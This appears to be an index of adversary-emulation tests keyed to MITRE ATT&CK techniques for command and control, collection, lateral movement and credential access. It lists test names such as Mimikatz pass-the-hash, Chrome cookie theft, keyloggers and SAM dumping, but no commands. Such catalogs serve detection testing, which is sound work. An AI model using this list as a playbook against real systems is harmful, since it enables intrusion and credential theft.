1479 command-and-control T1572 Protocol Tunneling 5 Microsoft Dev tunnels (Linux/macOS) 9f94a112-1ce2-464d-a63b-83c1f465f801 bash
1480 command-and-control T1572 Protocol Tunneling 6 VSCode tunnels (Linux/macOS) b877943f-0377-44f4-8477-f79db7f07c4d sh
1481 command-and-control T1572 Protocol Tunneling 7 Cloudflare tunnels (Linux/macOS) 228c336a-2f79-4043-8aef-bfa453a611d5 sh
1482 command-and-control T1090.003 Proxy: Multi-hop Proxy 1 Psiphon 14d55ca0-920e-4b44-8425-37eedd72b173 powershell
1483 command-and-control T1090.003 Proxy: Multi-hop Proxy 2 Tor Proxy Usage - Windows 7b9d85e5-c4ce-4434-8060-d3de83595e69 powershell
1484 command-and-control T1090.003 Proxy: Multi-hop Proxy 3 Tor Proxy Usage - Debian/Ubuntu/FreeBSD 5ff9d047-6e9c-4357-b39b-5cf89d9b59c7 sh
1485 command-and-control T1090.003 Proxy: Multi-hop Proxy 4 Tor Proxy Usage - MacOS 12631354-fdbc-4164-92be-402527e748da sh
1486 command-and-control T1571 Non-Standard Port 1 Testing usage of uncommonly used port with PowerShell 21fe622f-8e53-4b31-ba83-6d333c2583f4 powershell
1487 command-and-control T1571 Non-Standard Port 2 Testing usage of uncommonly used port 5db21e1d-dd9c-4a50-b885-b1e748912767 sh
1488 command-and-control T1573 Encrypted Channel 1 OpenSSL C2 21caf58e-87ad-440c-a6b8-3ac259964003 powershell
1489 command-and-control T1095 Non-Application Layer Protocol 1 ICMP C2 0268e63c-e244-42db-bef7-72a9e59fc1fc powershell
1490 command-and-control T1095 Non-Application Layer Protocol 2 Netcat C2 bcf0d1c1-3f6a-4847-b1c9-7ed4ea321f37 powershell
1491 command-and-control T1095 Non-Application Layer Protocol 3 Powercat C2 3e0e0e7f-6aa2-4a61-b61d-526c2cc9330e powershell
1492 command-and-control T1095 Non-Application Layer Protocol 4 Linux ICMP Reverse Shell using icmp-cnc 8e139e1f-1f3a-4be7-901d-afae9738c064 manual
1493 command-and-control T1071.001 Application Layer Protocol: Web Protocols 1 Malicious User Agents - Powershell 81c13829-f6c9-45b8-85a6-053366d55297 powershell
1494 command-and-control T1071.001 Application Layer Protocol: Web Protocols 2 Malicious User Agents - CMD dc3488b0-08c7-4fea-b585-905c83b48180 command_prompt
1495 command-and-control T1071.001 Application Layer Protocol: Web Protocols 3 Malicious User Agents - Nix 2d7c471a-e887-4b78-b0dc-b0df1f2e0658 sh
1496 command-and-control T1105 Ingress Tool Transfer 1 rsync remote file copy (push) 0fc6e977-cb12-44f6-b263-2824ba917409 sh
1497 command-and-control T1105 Ingress Tool Transfer 2 rsync remote file copy (pull) 3180f7d5-52c0-4493-9ea0-e3431a84773f sh
1498 command-and-control T1105 Ingress Tool Transfer 3 scp remote file copy (push) 83a49600-222b-4866-80a0-37736ad29344 sh
1499 command-and-control T1105 Ingress Tool Transfer 4 scp remote file copy (pull) b9d22b9a-9778-4426-abf0-568ea64e9c33 sh
1500 command-and-control T1105 Ingress Tool Transfer 5 sftp remote file copy (push) f564c297-7978-4aa9-b37a-d90477feea4e bash
1501 command-and-control T1105 Ingress Tool Transfer 6 sftp remote file copy (pull) 0139dba1-f391-405e-a4f5-f3989f2c88ef sh
1502 command-and-control T1105 Ingress Tool Transfer 7 certutil download (urlcache) dd3b61dd-7bbc-48cd-ab51-49ad1a776df0 command_prompt
1503 command-and-control T1105 Ingress Tool Transfer 8 certutil download (verifyctl) ffd492e3-0455-4518-9fb1-46527c9f241b powershell
1504 command-and-control T1105 Ingress Tool Transfer 9 Windows - BITSAdmin BITS Download a1921cd3-9a2d-47d5-a891-f1d0f2a7a31b command_prompt
1505 command-and-control T1105 Ingress Tool Transfer 10 Windows - PowerShell Download 42dc4460-9aa6-45d3-b1a6-3955d34e1fe8 powershell
1506 command-and-control T1105 Ingress Tool Transfer 11 OSTAP Worming Activity 2ca61766-b456-4fcf-a35a-1233685e1cad command_prompt
1507 command-and-control T1105 Ingress Tool Transfer 12 svchost writing a file to a UNC path fa5a2759-41d7-4e13-a19c-e8f28a53566f command_prompt
1508 command-and-control T1105 Ingress Tool Transfer 13 Download a File with Windows Defender MpCmdRun.exe 815bef8b-bf91-4b67-be4c-abe4c2a94ccc command_prompt
1509 command-and-control T1105 Ingress Tool Transfer 14 whois file download c99a829f-0bb8-4187-b2c6-d47d1df74cab sh
1510 command-and-control T1105 Ingress Tool Transfer 15 File Download via PowerShell 54a4daf1-71df-4383-9ba7-f1a295d8b6d2 powershell
1511 command-and-control T1105 Ingress Tool Transfer 16 File download with finger.exe on Windows 5f507e45-8411-4f99-84e7-e38530c45d01 command_prompt
1512 command-and-control T1105 Ingress Tool Transfer 17 Download a file with IMEWDBLD.exe 1a02df58-09af-4064-a765-0babe1a0d1e2 powershell
1513 command-and-control T1105 Ingress Tool Transfer 18 Curl Download File 2b080b99-0deb-4d51-af0f-833d37c4ca6a command_prompt
1514 command-and-control T1105 Ingress Tool Transfer 19 Curl Upload File 635c9a38-6cbf-47dc-8615-3810bc1167cf command_prompt
1515 command-and-control T1105 Ingress Tool Transfer 20 Download a file with Microsoft Connection Manager Auto-Download d239772b-88e2-4a2e-8473-897503401bcc command_prompt
1516 command-and-control T1105 Ingress Tool Transfer 21 MAZE Propagation Script 70f4d07c-5c3e-4d53-bb0a-cdf3ada14baf powershell
1517 command-and-control T1105 Ingress Tool Transfer 22 Printer Migration Command-Line Tool UNC share folder into a zip file 49845fc1-7961-4590-a0f0-3dbcf065ae7e command_prompt
1518 command-and-control T1105 Ingress Tool Transfer 23 Lolbas replace.exe use to copy file 54782d65-12f0-47a5-b4c1-b70ee23de6df command_prompt
1519 command-and-control T1105 Ingress Tool Transfer 24 Lolbas replace.exe use to copy UNC file ed0335ac-0354-400c-8148-f6151d20035a command_prompt
1520 command-and-control T1105 Ingress Tool Transfer 25 certreq download 6fdaae87-c05b-42f8-842e-991a74e8376b command_prompt
1521 command-and-control T1105 Ingress Tool Transfer 26 Download a file using wscript 97116a3f-efac-4b26-8336-b9cb18c45188 command_prompt
1522 command-and-control T1105 Ingress Tool Transfer 27 Linux Download File and Run bdc373c5-e9cf-4563-8a7b-a9ba720a90f3 sh
1523 command-and-control T1105 Ingress Tool Transfer 28 Nimgrab - Transfer Files b1729c57-9384-4d1c-9b99-9b220afb384e command_prompt
1524 command-and-control T1105 Ingress Tool Transfer 29 iwr or Invoke Web-Request download c01cad7f-7a4c-49df-985e-b190dcf6a279 command_prompt
1525 command-and-control T1105 Ingress Tool Transfer 30 Arbitrary file download using the Notepad++ GUP.exe binary 66ee226e-64cb-4dae-80e3-5bf5763e4a51 command_prompt
1526 command-and-control T1105 Ingress Tool Transfer 31 File download via nscurl 5bcefe5f-3f30-4f1c-a61a-8d7db3f4450c sh
1527 command-and-control T1105 Ingress Tool Transfer 32 File Download with Sqlcmd.exe 6934c16e-0b3a-4e7f-ab8c-c414acd32181 powershell
1528 command-and-control T1105 Ingress Tool Transfer 33 Remote File Copy using PSCP c82b1e60-c549-406f-9b00-0a8ae31c9cfe command_prompt
1529 command-and-control T1105 Ingress Tool Transfer 34 Windows push file using scp.exe 2a4b0d29-e5dd-4b66-b729-07423ba1cd9d powershell
1530 command-and-control T1105 Ingress Tool Transfer 35 Windows pull file using scp.exe 401667dc-05a6-4da0-a2a7-acfe4819559c powershell
1531 command-and-control T1105 Ingress Tool Transfer 36 Windows push file using sftp.exe 205e676e-0401-4bae-83a5-94b8c5daeb22 powershell
1532 command-and-control T1105 Ingress Tool Transfer 37 Windows pull file using sftp.exe 3d25f1f2-55cb-4a41-a523-d17ad4cfba19 powershell
1533 command-and-control T1105 Ingress Tool Transfer 38 Download a file with OneDrive Standalone Updater 3dd6a6cf-9c78-462c-bd75-e9b54fc8925b powershell
1534 command-and-control T1105 Ingress Tool Transfer 39 Curl Insecure Connection from a Pod 7e2ad0db-1efa-4af2-a77c-bc6e87d7b3f3 bash
1535 command-and-control T1001.002 Data Obfuscation via Steganography 1 Steganographic Tarball Embedding c7921449-8b62-4c4d-8a83-d9281ac0190b powershell
1536 command-and-control T1001.002 Data Obfuscation via Steganography 2 Embedded Script in Image Execution via Extract-Invoke-PSImage 04bb8e3d-1670-46ab-a3f1-5cee64da29b6 powershell
1537 command-and-control T1001.002 Data Obfuscation via Steganography 3 Execute Embedded Script in Image via Steganography 4ff61684-ad91-405c-9fbc-048354ff1d07 sh
1538 command-and-control T1090.001 Proxy: Internal Proxy 1 Connection Proxy 0ac21132-4485-4212-a681-349e8a6637cd sh
1539 command-and-control T1090.001 Proxy: Internal Proxy 2 Connection Proxy for macOS UI 648d68c1-8bcd-4486-9abe-71c6655b6a2c sh
1540 command-and-control T1090.001 Proxy: Internal Proxy 3 portproxy reg key b8223ea9-4be2-44a6-b50a-9657a3d4e72a powershell
1541 collection T1560.001 Archive Collected Data: Archive via Utility 1 Compress Data for Exfiltration With Rar 02ea31cb-3b4c-4a2d-9bf1-e4e70ebcf5d0 command_prompt
1542 collection T1560.001 Archive Collected Data: Archive via Utility 2 Compress Data and lock with password for Exfiltration with winrar 8dd61a55-44c6-43cc-af0c-8bdda276860c command_prompt
1543 collection T1560.001 Archive Collected Data: Archive via Utility 3 Compress Data and lock with password for Exfiltration with winzip 01df0353-d531-408d-a0c5-3161bf822134 command_prompt
1544 collection T1560.001 Archive Collected Data: Archive via Utility 4 Compress Data and lock with password for Exfiltration with 7zip d1334303-59cb-4a03-8313-b3e24d02c198 command_prompt
1545 collection T1560.001 Archive Collected Data: Archive via Utility 5 Data Compressed - nix - zip c51cec55-28dd-4ad2-9461-1eacbc82c3a0 bash
1546 collection T1560.001 Archive Collected Data: Archive via Utility 6 Data Compressed - nix - gzip Single File cde3c2af-3485-49eb-9c1f-0ed60e9cc0af sh
1547 collection T1560.001 Archive Collected Data: Archive via Utility 7 Data Compressed - nix - tar Folder or File 7af2b51e-ad1c-498c-aca8-d3290c19535a sh
1548 collection T1560.001 Archive Collected Data: Archive via Utility 8 Data Encrypted with zip and gpg symmetric 0286eb44-e7ce-41a0-b109-3da516e05a5f sh
1549 collection T1560.001 Archive Collected Data: Archive via Utility 9 Encrypts collected data with AES-256 and Base64 a743e3a6-e8b2-4a30-abe7-ca85d201b5d3 bash
1550 collection T1560.001 Archive Collected Data: Archive via Utility 10 ESXi - Remove Syslog remote IP 36c62584-d360-41d6-886f-d194654be7c2 powershell
1551 collection T1560.001 Archive Collected Data: Archive via Utility 11 Compress a File for Exfiltration using Makecab 2a7bc405-9555-4f49-ace2-b2ae2941d629 command_prompt
1552 collection T1560.001 Archive Collected Data: Archive via Utility 12 Copy and Compress AppData Folder 05e8942e-f04f-460a-b560-f7781257feec powershell
1553 collection T1113 Screen Capture 1 Screencapture 0f47ceb1-720f-4275-96b8-21f0562217ac bash
1554 collection T1113 Screen Capture 2 Screencapture (silent) deb7d358-5fbd-4dc4-aecc-ee0054d2d9a4 bash
1555 collection T1113 Screen Capture 3 X Windows Capture 8206dd0c-faf6-4d74-ba13-7fbe13dce6ac bash
1556 collection T1113 Screen Capture 4 X Windows Capture (freebsd) 562f3bc2-74e8-46c5-95c7-0e01f9ccc65c sh
1557 collection T1113 Screen Capture 5 Capture Linux Desktop using Import Tool 9cd1cccb-91e4-4550-9139-e20a586fcea1 bash
1558 collection T1113 Screen Capture 6 Capture Linux Desktop using Import Tool (freebsd) 18397d87-38aa-4443-a098-8a48a8ca5d8d sh
1559 collection T1113 Screen Capture 7 Windows Screencapture 3c898f62-626c-47d5-aad2-6de873d69153 powershell
1560 collection T1113 Screen Capture 8 Windows Screen Capture (CopyFromScreen) e9313014-985a-48ef-80d9-cde604ffc187 powershell
1561 collection T1113 Screen Capture 9 Windows Recall Feature Enabled - DisableAIDataAnalysis Value Deleted 5a496325-0115-4274-8eb9-755b649ad0fb powershell
1562 collection T1056.001 Input Capture: Keylogging 1 Input Capture d9b633ca-8efb-45e6-b838-70f595c6ae26 powershell
1563 collection T1056.001 Input Capture: Keylogging 2 Living off the land Terminal Input Capture on Linux with pam.d 9c6bdb34-a89f-4b90-acb1-5970614c711b sh
1564 collection T1056.001 Input Capture: Keylogging 3 Logging bash history to syslog 0e59d59d-3265-4d35-bebd-bf5c1ec40db5 sh
1565 collection T1056.001 Input Capture: Keylogging 4 Logging sh history to syslog/messages b04284dc-3bd9-4840-8d21-61b8d31c99f2 sh
1566 collection T1056.001 Input Capture: Keylogging 5 Bash session based keylogger 7f85a946-a0ea-48aa-b6ac-8ff539278258 bash
1567 collection T1056.001 Input Capture: Keylogging 6 SSHD PAM keylogger 81d7d2ad-d644-4b6a-bea7-28ffe43becca sh
1568 collection T1056.001 Input Capture: Keylogging 7 Auditd keylogger a668edb9-334e-48eb-8c2e-5413a40867af sh
1569 collection T1056.001 Input Capture: Keylogging 8 MacOS Swift Keylogger aee3a097-4c5c-4fff-bbd3-0a705867ae29 bash
1570 collection T1123 Audio Capture 1 using device audio capture commandlet 9c3ad250-b185-4444-b5a9-d69218a10c95 powershell
1571 collection T1123 Audio Capture 2 Registry artefact when application use microphone 7a21cce2-6ada-4f7c-afd9-e1e9c481e44a command_prompt
1572 collection T1123 Audio Capture 3 using Quicktime Player c7a0bb71-70ce-4a53-b115-881f241b795b sh
1573 collection T1025 Data from Removable Media 1 Identify Documents on USB and Removable Media via PowerShell 0b29f7e3-a050-44b7-bf05-9fb86af1ec2e command_prompt
1574 collection T1074.001 Data Staged: Local Data Staging 1 Stage data from Discovery.bat 107706a5-6f9f-451a-adae-bab8c667829f powershell
1575 collection T1074.001 Data Staged: Local Data Staging 2 Stage data from Discovery.sh 39ce0303-ae16-4b9e-bb5b-4f53e8262066 sh
1576 collection T1074.001 Data Staged: Local Data Staging 3 Zip a Folder with PowerShell for Staging in Temp a57fbe4b-3440-452a-88a7-943531ac872a powershell
1577 collection T1114.001 Email Collection: Local Email Collection 1 Email Collection with PowerShell Get-Inbox 3f1b5096-0139-4736-9b78-19bcb02bb1cb powershell
1578 collection T1119 Automated Collection 1 Automated Collection Command Prompt cb379146-53f1-43e0-b884-7ce2c635ff5b command_prompt
1579 collection T1119 Automated Collection 2 Automated Collection PowerShell 634bd9b9-dc83-4229-b19f-7f83ba9ad313 powershell
1580 collection T1119 Automated Collection 3 Recon information for export with PowerShell c3f6d794-50dd-482f-b640-0384fbb7db26 powershell
1581 collection T1119 Automated Collection 4 Recon information for export with Command Prompt aa1180e2-f329-4e1e-8625-2472ec0bfaf3 command_prompt
1582 collection T1115 Clipboard Data 1 Utilize Clipboard to store or execute commands from 0cd14633-58d4-4422-9ede-daa2c9474ae7 command_prompt
1583 collection T1115 Clipboard Data 2 Execute Commands from Clipboard using PowerShell d6dc21af-bec9-4152-be86-326b6babd416 powershell
1584 collection T1115 Clipboard Data 3 Execute commands from clipboard 1ac2247f-65f8-4051-b51f-b0ccdfaaa5ff bash
1585 collection T1115 Clipboard Data 4 Collect Clipboard Data via VBA 9c8d5a72-9c98-48d3-b9bf-da2cc43bdf52 powershell
1586 collection T1115 Clipboard Data 5 Add or copy content to clipboard with xClip ee363e53-b083-4230-aff3-f8d955f2d5bb sh
1587 collection T1530 Data from Cloud Storage Object 1 AWS - Scan for Anonymous Access to S3 979356b9-b588-4e49-bba4-c35517c484f5 sh
1588 collection T1530 Data from Cloud Storage Object 2 Azure - Dump Azure Storage Account Objects via Azure CLI 67374845-b4c8-4204-adcc-9b217b65d4f1 powershell
1589 collection T1005 Data from Local System 1 Search files of interest and save them to a single zip file (Windows) d3d9af44-b8ad-4375-8b0a-4bff4b7e419c powershell
1590 collection T1005 Data from Local System 2 Find and dump sqlite databases (Linux) 00cbb875-7ae4-4cf1-b638-e543fd825300 bash
1591 collection T1005 Data from Local System 3 Copy Apple Notes database files using AppleScript cfb6d400-a269-4c06-a347-6d88d584d5f7 sh
1592 collection T1560.002 Archive Collected Data: Archive via Library 1 Compressing data using GZip in Python (FreeBSD/Linux) 391f5298-b12d-4636-8482-35d9c17d53a8 sh
1593 collection T1560.002 Archive Collected Data: Archive via Library 2 Compressing data using bz2 in Python (FreeBSD/Linux) c75612b2-9de0-4d7c-879c-10d7b077072d sh
1594 collection T1560.002 Archive Collected Data: Archive via Library 3 Compressing data using zipfile in Python (FreeBSD/Linux) 001a042b-859f-44d9-bf81-fd1c4e2200b0 sh
1595 collection T1560.002 Archive Collected Data: Archive via Library 4 Compressing data using tarfile in Python (FreeBSD/Linux) e86f1b4b-fcc1-4a2a-ae10-b49da01458db sh
1596 collection T1560 Archive Collected Data 1 Compress Data for Exfiltration With PowerShell 41410c60-614d-4b9d-b66e-b0192dd9c597 powershell
1597 collection T1557.001 Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay 1 LLMNR Poisoning with Inveigh (PowerShell) deecd55f-afe0-4a62-9fba-4d1ba2deb321 powershell
1598 collection T1125 Video Capture 1 Registry artefact when application use webcam 6581e4a7-42e3-43c5-a0d2-5a0d62f9702a command_prompt
1599 collection T1114.003 Email Collection: Email Forwarding Rule 1 Office365 - Email Forwarding 3234117e-151d-4254-9150-3d0bac41e38c powershell
1600 collection T1056.002 Input Capture: GUI Input Capture 1 AppleScript - Prompt User for Password 76628574-0bc1-4646-8fe2-8f4427b47d15 bash
1601 collection T1056.002 Input Capture: GUI Input Capture 2 PowerShell - Prompt User for Password 2b162bfd-0928-4d4c-9ec3-4d9f88374b52 powershell
1602 collection T1056.002 Input Capture: GUI Input Capture 3 AppleScript - Spoofing a credential prompt using osascript b7037b89-947a-427a-ba29-e7e9f09bc045 bash
1603 collection T1039 Data from Network Shared Drive 1 Copy a sensitive File over Administrative share with copy 6ed67921-1774-44ba-bac6-adb51ed60660 command_prompt
1604 collection T1039 Data from Network Shared Drive 2 Copy a sensitive File over Administrative share with Powershell 7762e120-5879-44ff-97f8-008b401b9a98 powershell
1605 collection T1114.002 Email Collection: Remote Email Collection 1 Office365 - Remote Mail Collected 36657d95-d9d6-4fbf-8a31-f4085607bafd powershell
1606 collection T1056.004 Input Capture: Credential API Hooking 1 Hook PowerShell TLS Encrypt/Decrypt Messages de1934ea-1fbf-425b-8795-65fb27dd7e33 powershell
1607 lateral-movement T1021.005 Remote Services:VNC 1 Enable Apple Remote Desktop Agent 8a930abe-841c-4d4f-a877-72e9fe90b9ea sh
1608 lateral-movement T1021.004 Remote Services: SSH 1 ESXi - Enable SSH via PowerCLI 8f6c14d1-f13d-4616-b7fc-98cc69fe56ec powershell
1609 lateral-movement T1021.004 Remote Services: SSH 2 ESXi - Enable SSH via VIM-CMD 280812c8-4dae-43e9-a74e-1d08ab997c0e command_prompt
1610 lateral-movement T1091 Replication Through Removable Media 1 USB Malware Spread Simulation d44b7297-622c-4be8-ad88-ec40d7563c75 powershell
1611 lateral-movement T1021.002 Remote Services: SMB/Windows Admin Shares 1 Map admin share 3386975b-367a-4fbb-9d77-4dcf3639ffd3 command_prompt
1612 lateral-movement T1021.002 Remote Services: SMB/Windows Admin Shares 2 Map Admin Share PowerShell 514e9cd7-9207-4882-98b1-c8f791bae3c5 powershell
1613 lateral-movement T1021.002 Remote Services: SMB/Windows Admin Shares 3 Copy and Execute File with PsExec 0eb03d41-79e4-4393-8e57-6344856be1cf command_prompt
1614 lateral-movement T1021.002 Remote Services: SMB/Windows Admin Shares 4 Execute command writing output to local Admin Share d41aaab5-bdfe-431d-a3d5-c29e9136ff46 command_prompt
1615 lateral-movement T1021.006 Remote Services: Windows Remote Management 1 Enable Windows Remote Management 9059e8de-3d7d-4954-a322-46161880b9cf powershell
1616 lateral-movement T1021.006 Remote Services: Windows Remote Management 2 Remote Code Execution with PS Credentials Using Invoke-Command 5295bd61-bd7e-4744-9d52-85962a4cf2d6 powershell
1617 lateral-movement T1021.006 Remote Services: Windows Remote Management 3 WinRM Access with Evil-WinRM efe86d95-44c4-4509-ae42-7bfd9d1f5b3d powershell
1618 lateral-movement T1021.003 Remote Services: Distributed Component Object Model 1 PowerShell Lateral Movement using MMC20 6dc74eb1-c9d6-4c53-b3b5-6f50ae339673 powershell
1619 lateral-movement T1021.003 Remote Services: Distributed Component Object Model 2 PowerShell Lateral Movement Using Excel Application Object 505f24be-1c11-4694-b614-e01ae1cd2570 powershell
1620 lateral-movement T1550.003 Use Alternate Authentication Material: Pass the Ticket 1 Mimikatz Kerberos Ticket Attack dbf38128-7ba7-4776-bedf-cc2eed432098 command_prompt
1621 lateral-movement T1550.003 Use Alternate Authentication Material: Pass the Ticket 2 Rubeus Kerberos Pass The Ticket a2fc4ec5-12c6-4fb4-b661-961f23f359cb powershell
1622 lateral-movement T1072 Software Deployment Tools 1 Radmin Viewer Utility b4988cad-6ed2-434d-ace5-ea2670782129 command_prompt
1623 lateral-movement T1072 Software Deployment Tools 2 PDQ Deploy RAT e447b83b-a698-4feb-bed1-a7aaf45c3443 command_prompt
1624 lateral-movement T1072 Software Deployment Tools 3 Deploy 7-Zip Using Chocolatey 2169e8b0-2ee7-44cb-8a6e-d816a5db7d8a powershell
1625 lateral-movement T1570 Lateral Tool Transfer 1 Exfiltration Over SMB over QUIC (New-SmbMapping) d8d13303-159e-4f33-89f4-9f07812d016f powershell
1626 lateral-movement T1570 Lateral Tool Transfer 2 Exfiltration Over SMB over QUIC (NET USE) 183235ca-8e6c-422c-88c2-3aa28c4825d9 powershell
1627 lateral-movement T1563.002 Remote Service Session Hijacking: RDP Hijacking 1 RDP hijacking a37ac520-b911-458e-8aed-c5f1576d9f46 command_prompt
1628 lateral-movement T1550.002 Use Alternate Authentication Material: Pass the Hash 1 Mimikatz Pass the Hash ec23cef9-27d9-46e4-a68d-6f75f7b86908 command_prompt
1629 lateral-movement T1550.002 Use Alternate Authentication Material: Pass the Hash 2 crackmapexec Pass the Hash eb05b028-16c8-4ad8-adea-6f5b219da9a9 command_prompt
1630 lateral-movement T1550.002 Use Alternate Authentication Material: Pass the Hash 3 Invoke-WMIExec Pass the Hash f8757545-b00a-4e4e-8cfb-8cfb961ee713 powershell
1631 lateral-movement T1021.001 Remote Services: Remote Desktop Protocol 1 RDP to DomainController 355d4632-8cb9-449d-91ce-b566d0253d3e powershell
1632 lateral-movement T1021.001 Remote Services: Remote Desktop Protocol 2 Changing RDP Port to Non Standard Port via Powershell 2f840dd4-8a2e-4f44-beb3-6b2399ea3771 powershell
1633 lateral-movement T1021.001 Remote Services: Remote Desktop Protocol 3 Changing RDP Port to Non Standard Port via Command_Prompt 74ace21e-a31c-4f7d-b540-53e4eb6d1f73 command_prompt
1634 lateral-movement T1021.001 Remote Services: Remote Desktop Protocol 4 Disable NLA for RDP via Command Prompt 01d1c6c0-faf0-408e-b368-752a02285cb2 command_prompt
1635 credential-access T1556.003 Modify Authentication Process: Pluggable Authentication Modules 1 Malicious PAM rule 4b9dde80-ae22-44b1-a82a-644bf009eb9c sh
1636 credential-access T1556.003 Modify Authentication Process: Pluggable Authentication Modules 2 Malicious PAM rule (freebsd) b17eacac-282d-4ca8-a240-46602cf863e3 sh
1637 credential-access T1556.003 Modify Authentication Process: Pluggable Authentication Modules 3 Malicious PAM module 65208808-3125-4a2e-8389-a0a00e9ab326 sh
1638 credential-access T1056.001 Input Capture: Keylogging 1 Input Capture d9b633ca-8efb-45e6-b838-70f595c6ae26 powershell
1639 credential-access T1056.001 Input Capture: Keylogging 2 Living off the land Terminal Input Capture on Linux with pam.d 9c6bdb34-a89f-4b90-acb1-5970614c711b sh
1640 credential-access T1056.001 Input Capture: Keylogging 3 Logging bash history to syslog 0e59d59d-3265-4d35-bebd-bf5c1ec40db5 sh
1641 credential-access T1056.001 Input Capture: Keylogging 4 Logging sh history to syslog/messages b04284dc-3bd9-4840-8d21-61b8d31c99f2 sh
1642 credential-access T1056.001 Input Capture: Keylogging 5 Bash session based keylogger 7f85a946-a0ea-48aa-b6ac-8ff539278258 bash
1643 credential-access T1056.001 Input Capture: Keylogging 6 SSHD PAM keylogger 81d7d2ad-d644-4b6a-bea7-28ffe43becca sh
1644 credential-access T1056.001 Input Capture: Keylogging 7 Auditd keylogger a668edb9-334e-48eb-8c2e-5413a40867af sh
1645 credential-access T1056.001 Input Capture: Keylogging 8 MacOS Swift Keylogger aee3a097-4c5c-4fff-bbd3-0a705867ae29 bash
1646 credential-access T1110.001 Brute Force: Password Guessing 1 Brute Force Credentials of single Active Directory domain users via SMB 09480053-2f98-4854-be6e-71ae5f672224 command_prompt
1647 credential-access T1110.001 Brute Force: Password Guessing 2 Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos) c2969434-672b-4ec8-8df0-bbb91f40e250 powershell
1648 credential-access T1110.001 Brute Force: Password Guessing 3 Brute Force Credentials of single Azure AD user 5a51ef57-299e-4d62-8e11-2d440df55e69 powershell
1649 credential-access T1110.001 Brute Force: Password Guessing 4 Password Brute User using Kerbrute Tool 59dbeb1a-79a7-4c2a-baf4-46d0f4c761c4 powershell
1650 credential-access T1110.001 Brute Force: Password Guessing 5 SUDO Brute Force - Debian ba1bf0b6-f32b-4db0-b7cc-d78cacc76700 bash
1651 credential-access T1110.001 Brute Force: Password Guessing 6 SUDO Brute Force - Redhat 4097bc00-5eeb-4d56-aaf9-287d60351d95 bash
1652 credential-access T1110.001 Brute Force: Password Guessing 7 SUDO Brute Force - FreeBSD abcde488-e083-4ee7-bc85-a5684edd7541 bash
1653 credential-access T1110.001 Brute Force: Password Guessing 8 ESXi - Brute Force Until Account Lockout ed6c2c87-bba6-4a28-ac6e-c8af3d6c2ab5 powershell
1654 credential-access T1003 OS Credential Dumping 1 Gsecdump 96345bfc-8ae7-4b6a-80b7-223200f24ef9 command_prompt
1655 credential-access T1003 OS Credential Dumping 2 Credential Dumping with NPPSpy 9e2173c0-ba26-4cdf-b0ed-8c54b27e3ad6 powershell
1656 credential-access T1003 OS Credential Dumping 3 Dump svchost.exe to gather RDP credentials d400090a-d8ca-4be0-982e-c70598a23de9 powershell
1657 credential-access T1003 OS Credential Dumping 4 Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using list) 6c7a4fd3-5b0b-4b30-a93e-39411b25d889 powershell
1658 credential-access T1003 OS Credential Dumping 5 Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using config) 42510244-5019-48fa-a0e5-66c3b76e6049 powershell
1659 credential-access T1003 OS Credential Dumping 6 Dump Credential Manager using keymgr.dll and rundll32.exe 84113186-ed3c-4d0d-8a3c-8980c86c1f4a powershell
1660 credential-access T1003 OS Credential Dumping 7 Send NTLM Hash with RPC Test Connection 0b207037-813c-4444-ac3f-b597cf280a67 powershell
1661 credential-access T1539 Steal Web Session Cookie 1 Steal Firefox Cookies (Windows) 4b437357-f4e9-4c84-9fa6-9bcee6f826aa powershell
1662 credential-access T1539 Steal Web Session Cookie 2 Steal Chrome Cookies (Windows) 26a6b840-4943-4965-8df5-ef1f9a282440 powershell
1663 credential-access T1539 Steal Web Session Cookie 3 Steal Chrome Cookies via Remote Debugging (Mac) e43cfdaf-3fb8-4a45-8de0-7eee8741d072 bash
1664 credential-access T1539 Steal Web Session Cookie 4 Steal Chrome v127+ cookies via Remote Debugging (Windows) b647f4ee-88de-40ac-9419-f17fac9489a7 powershell
1665 credential-access T1539 Steal Web Session Cookie 5 Copy Safari BinaryCookies files using AppleScript e57ba07b-3a33-40cd-a892-748273b9b49a sh
1666 credential-access T1003.002 OS Credential Dumping: Security Account Manager 1 Registry dump of SAM, creds, and secrets 5c2571d0-1572-416d-9676-812e64ca9f44 command_prompt
1667 credential-access T1003.002 OS Credential Dumping: Security Account Manager 2 Registry parse with pypykatz a96872b2-cbf3-46cf-8eb4-27e8c0e85263 command_prompt
1668 credential-access T1003.002 OS Credential Dumping: Security Account Manager 3 esentutl.exe SAM copy a90c2f4d-6726-444e-99d2-a00cd7c20480 command_prompt
1669 credential-access T1003.002 OS Credential Dumping: Security Account Manager 4 PowerDump Hashes and Usernames from Registry 804f28fc-68fc-40da-b5a2-e9d0bce5c193 powershell
1670 credential-access T1003.002 OS Credential Dumping: Security Account Manager 5 dump volume shadow copy hives with certutil eeb9751a-d598-42d3-b11c-c122d9c3f6c7 command_prompt
1671 credential-access T1003.002 OS Credential Dumping: Security Account Manager 6 dump volume shadow copy hives with System.IO.File 9d77fed7-05f8-476e-a81b-8ff0472c64d0 powershell
1672 credential-access T1003.002 OS Credential Dumping: Security Account Manager 7 WinPwn - Loot local Credentials - Dump SAM-File for NTLM Hashes 0c0f5f06-166a-4f4d-bb4a-719df9a01dbb powershell
1673 credential-access T1003.002 OS Credential Dumping: Security Account Manager 8 Dumping of SAM, creds, and secrets(Reg Export) 21df41be-cdd8-4695-a650-c3981113aa3c command_prompt
1674 credential-access T1552.005 Unsecured Credentials: Cloud Instance Metadata API 1 Azure - Search Azure AD User Attributes for Passwords ae9b2e3e-efa1-4483-86e2-fae529ab9fb6 powershell
1675 credential-access T1552.005 Unsecured Credentials: Cloud Instance Metadata API 2 Azure - Dump Azure Instance Metadata from Virtual Machines cc99e772-4e18-4f1f-b422-c5cdd1bfd7b7 powershell
1676 credential-access T1110.002 Brute Force: Password Cracking 1 Password Cracking with Hashcat 6d27df5d-69d4-4c91-bc33-5983ffe91692 command_prompt
1677 credential-access T1555.001 Credentials from Password Stores: Keychain 1 Keychain Dump 88e1fa00-bf63-4e5b-a3e1-e2ea51c8cca6 sh
1678 credential-access T1555.001 Credentials from Password Stores: Keychain 2 Export Certificate Item(s) 1864fdec-ff86-4452-8c30-f12507582a93 sh
1679 credential-access T1555.001 Credentials from Password Stores: Keychain 3 Import Certificate Item(s) into Keychain e544bbcb-c4e0-4bd0-b614-b92131635f59 sh
1680 credential-access T1555.001 Credentials from Password Stores: Keychain 4 Copy Keychain using cat utility 5c32102a-c508-49d3-978f-288f8a9f6617 sh
